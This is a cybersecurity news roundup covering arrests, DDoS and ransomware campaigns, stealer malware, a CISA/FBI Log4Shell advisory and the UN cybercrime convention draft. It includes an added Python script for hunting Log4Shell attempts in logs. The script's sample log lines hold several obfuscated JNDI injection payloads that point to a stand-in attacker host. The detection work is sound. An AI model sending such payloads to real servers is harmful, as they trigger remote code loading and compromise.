In an internationally coordinated action led by the UK and supported by Europol and Eurojust, 142 suspects have been arrested for allegedly running a website that offered spoofing services. These services allowed cybercriminals to impersonate trusted corporations such as banks, retail companies, and government institutions and then access sensitive information. Evidence shows that the estimated worldwide loss has been more than EUR 115 million. National authorities from the EU, Australia, and Canada supported the investigation. At the same time, Europol’s European Cybercrime Centre (EC3) provided a secure platform and was thus able to identify additional users of spoofing services.
Cybercrime
Killnet hits EU Parliament website with DDoS attack
The European Parliament website has been taken down by a DDoS attack claimed by Anonymous Russia, a member of the pro-Russian hacktivist group Killnet.
The President of the European Parliament confirmed the event, saying that the Parliament’s ‘IT experts are pushing back against it and protecting our systems’.
The attack occurred after the European Parliament designated Russia a state sponsor of terrorism and members advocated that Russia be more isolated internationally.
Study conducted in Australia shows strong links between data breaches and cybercrime victimisation
An extensive survey conducted in Australia in 2021 revealed that one in ten respondents had been notified of a data breach within the previous twelve months, with roughly 28% of those respondents reporting that they had been a victim of identity theft. Data breaches were mainly due to data custodians being targeted by malicious actors, or to information held by these custodians being released due to human error. Significant relationships were also discovered between data breaches and online scams and fraud, and ransomware.
Singapore-based Group-IB identified 34 Russian cybercrime groups
The Singapore-based research team, Group-IB, has identified 34 Russian cybercrime groups responsible for distributing info-stealing malware under the stealer-as-a-service model. The cybercriminals use this type of malware to target users of Steam, Roblox, and Amazon in 111 countries, obtaining user credentials stored in browsers, bank card details, and crypto wallet information from infected computers and selling them on the dark web. Group-IB estimates that more than 890,000 devices in 111 countries were infected in the first seven months of 2022. The five most attacked countries are the USA, Brazil, India, Germany, and Indonesia, while the estimated value of stolen credentials is around $5.8 million.
Australian Children’s charity falls victim to cyberattack
Australian children’s charity The Smith Family suffered a cyberattack, with hackers stealing confidential information about donors including their credit card details. While no evidence points to misuse of donor information as yet, similar breaches in recent times have proven early indications to be unreliable. Supporters have been told not to click on unknown links and to check with the Australian Cyber Security Centre (ACSC) for further advice. The incident has been reported to both the ACSC and the Office of the Australian Information Commissioner.
Australia to consolidate approach to cyber defence in light of a wave of ransomware attacks
According to Clare O’Neil, Australian Home Affairs Minister, the country will adopt a more muscular approach to cyber defence in response to a wave of ransomware attacks against Australian firms. Measures will include ‘hacking the hackers’ as part of the country’s offensive cyber capability (OCC), and the general use of strategic ambiguity to strike at cybercriminals while crafting responses to attacks on government and business, especially those demanding a ransom. The government is reportedly considering outlawing the payment of ransoms to disrupt the cybercriminals’ business model.
CISA and FBI issue joint advisory on Iranian government-sponsored APT actors compromising federal network
In the USA, the Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) have issued a cybersecurity advisory regarding an incident at a Federal Civilian Executive Branch (FCEB) organisation. Having assessed that the FCEB network was compromised by Iranian government-sponsored advanced persistent threat (APT) actors, the two entities provided details on the actors’ tactics, techniques, and procedures. One of the findings was that the cyber threat actors exploited the Log4Shell vulnerability in an unpatched VMware Horizon server. As such, organisations with affected VMware systems that did not immediately apply available patches or workarounds were advised to assume compromise and initiate threat-hunting activities.
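The threat-hunting step the advisory recommends usually starts with a search of web-server and application logs for Log4Shell lookup strings. The script below is an added example, not part of the advisory or of any CISA/FBI tooling: it normalises the common obfuscations of the `${jndi:...}` lookup (nested `${lower:}`/`${upper:}`, the `${::-x}` default-value trick and missing-lookup fallbacks such as `${env:NOPE:-x}`) before matching, so that a hunt over historical logs does not miss payloads that a naive string search would. The log lines and the `attacker.example` host are constructed for the demonstration.

```python
import re

# Innermost ${...} lookup with no nested lookup inside it.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")

# A resolved JNDI lookup: ${jndi:<scheme>:...}. The scheme is captured for reporting.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*([A-Za-z]+)\s*:[^}]*\}", re.IGNORECASE)


def _resolve(match):
    """Collapse one obfuscating lookup to the literal text Log4j would produce."""
    body = match.group(1)
    kind, _, arg = body.partition(":")
    kind = kind.lower()
    if kind == "lower":
        return arg.lower()
    if kind == "upper":
        return arg.upper()
    if kind == "jndi":
        # This is the lookup we are hunting for; keep it intact.
        return match.group(0)
    if ":-" in body:
        # ${::-j} and ${env:NOPE:-j}: an empty or missing lookup falls back to its default.
        return body.split(":-", 1)[1]
    # Unknown lookup (e.g. ${date:yyyy}); leave it alone.
    return match.group(0)


def normalize_lookups(text, max_rounds=20):
    """Repeatedly resolve inner lookups until the string stops changing."""
    for _ in range(max_rounds):
        resolved = INNER_LOOKUP.sub(_resolve, text)
        if resolved == text:
            return resolved
        text = resolved
    return text  # bounded so a pathological line cannot loop forever


def hunt_log4shell(lines):
    """Return (line_number, scheme, normalised lookup) for every JNDI lookup found."""
    hits = []
    for number, raw in enumerate(lines, start=1):
        normalised = normalize_lookups(raw)
        for m in JNDI_LOOKUP.finditer(normalised):
            hits.append((number, m.group(1).lower(), m.group(0)))
    return hits


# Constructed access-log lines; the user-agent field carries the payloads.
SAMPLE_LOG = [
    '10.0.0.5 - - [11/Nov/2022:10:01:02 +0000] "GET / HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - [11/Nov/2022:10:01:07 +0000] "GET / HTTP/1.1" 200 "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - [11/Nov/2022:10:01:09 +0000] "GET /portal HTTP/1.1" 200 "${${lower:j}ndi:${lower:l}dap://attacker.example/b}"',
    '10.0.0.9 - - [11/Nov/2022:10:01:11 +0000] "GET /portal HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://attacker.example/c}"',
    '10.0.0.9 - - [11/Nov/2022:10:01:15 +0000] "GET /x HTTP/1.1" 200 "${${env:NOPE:-j}ndi:dns://attacker.example/d}"',
    '10.0.0.2 - - [11/Nov/2022:10:02:00 +0000] "GET /docs HTTP/1.1" 200 "text mentioning ${date:yyyy} only"',
]

if __name__ == "__main__":
    for line_no, scheme, lookup in hunt_log4shell(SAMPLE_LOG):
        print(f"line {line_no}: scheme={scheme} lookup={lookup}")
```

The normalisation is deliberately conservative: it only collapses the lookup forms that are used purely for obfuscation and leaves `${jndi:...}` itself and any unrecognised lookup untouched, so a benign `${date:yyyy}` in log text does not produce a hit. A real hunt would run this over every field an attacker can control (User-Agent, X-Forwarded-For, request path, form data) rather than only the user-agent column shown here.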
DTrack activity detected in countries in Europe and Latin America
Kaspersky, a cybersecurity company, has detected DTrack activity in Germany, Brazil, India, Italy, Mexico, Switzerland, Saudi Arabia, Turkey, and the USA. The Lazarus group uses DTrack as a backdoor against a wide range of targets, allowing attackers to upload, download, launch, or delete files on the victim host. Education, chemical manufacturing, government research centres and policy institutes, IT service providers, power providers, and telecommunications are among the targeted industries.
New Somnia ransomware attacks target corporations in Ukraine
The Computer Emergency Response Team of Ukraine (CERT-UA) reported the spread of a new ransomware strain called ‘Somnia’, attributing the attacks to the Russian threat actor known as ‘From Russia with Love’ (FRwL), also known as ‘Z-Team’. The ransomware attacks targeted Ukrainian corporations’ employees, using their Telegram accounts to try to gain access to a corporate network.
As explained by CERT-UA, the group used fake sites that mimic the ‘Advanced IP Scanner’ software, which, if downloaded, infects the victim’s computer with the Vidar data-stealing malware that can capture Telegram session data, as well as take over the victim’s account.
Then, the threat actors used victims’ Telegram accounts to gain access to the corporate network. Once access to the target’s network was obtained, the hackers executed reconnaissance operations using tools like Netscan and deployed Cobalt Strike Beacons before exfiltrating data.
According to CERT-UA, the group had previously revealed that they created Somnia ransomware on Telegram and posted evidence of the attacks they made against Ukrainian targets.
Cybercrime Ad Hoc Committee Consolidated Negotiating Document
In preparation for the fourth session, the Committee Chair, with the support of the Secretariat, has prepared a ‘Consolidated negotiating document on the general provisions and the provisions on criminalization and on procedural measures and law enforcement of a comprehensive international convention on countering the use of information and communications technologies for criminal purposes.’ Essentially, the document is a compilation of the states’ proposals during the second session regarding the general provisions, criminalisation, procedural measures, and law enforcement of the draft convention. Regarding the general provisions, the document emphasises the protection of sovereignty, while most states agreed that the ‘use of terms’ shall be addressed after defining the substantive articles.
Criminalisation provisions cover offences such as illegal access, misuse of devices, and computer-related forgery, among others, while also including offences related to online child sexual abuse. Additionally, the document expands the criminalisation of offences, including but not limited to the incitement of armed activities, terrorism-related offences, and illegal distribution of medicines.
Provisions on procedural measures and law enforcement establish the jurisdiction over the offences that occurred in the territory of a state party, committed by or against a national of the state party, or committed against the state party. The article on jurisdiction ‘does not exclude the exercise of any criminal jurisdiction established by a State Party in accordance with its domestic law.’ Attention was also given to the search and seizure of electronic data, in which states are obliged to adopt measures that empower the competent authorities to search or seize computer data and digital information ‘where there is reasonable belief that a criminal offence was committed or is being committed… in the territory or under the jurisdiction of that State Party.’
Lastly, the consolidated document established that the implementation of the powers and procedures should be in line with international human rights law provisions, while highlighting the need to ensure witness protection.
